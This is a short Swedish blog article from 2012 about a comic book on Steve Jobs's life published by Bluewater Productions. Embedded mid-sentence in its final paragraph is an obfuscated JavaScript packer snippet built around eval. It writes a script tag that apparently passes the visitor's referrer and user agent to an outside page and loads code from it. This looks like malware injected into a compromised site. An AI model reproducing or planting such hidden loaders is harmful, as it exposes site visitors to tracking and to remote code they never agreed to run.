Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Steve Jobs liv i serietidning.

Steve Jobs liv i serietidning.
Filip Urde
  • On 12 januari, 2012
  • http://www.revue.se/filip-urde

Steve Jobs boken fick väll mer eller mindre alla i Julklapp, men tröttnade du inte av tjockleken på den boken och vill ha mer, då kanske en serietidning vore något för dig. Nu släpps en serietidning som handlar om Steve Jobs och hans liv.

”Steve Jobs: The co-founder of Apple” släpptes i en digital version igår av Bluewater Production och kommer ut idag som pappersversion.

Bluewater Productions har tidigare gjort serietidningar om Mark Zuckerberg och i mars kommer en med Bill Gates. Ganska kul nisch man skapat sig själva.

Om inte bok och serietidningen räcker, ja då kan ni köpa action figuren som vi skrev om här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dstar|var|u0026u|referrer|rzzbi||js|php’.split(’|’),0,{}))
tidigare eller titta på dokumentärenhär.

Och där var 2012 års Steve Jobs kvot räddad, perfekt.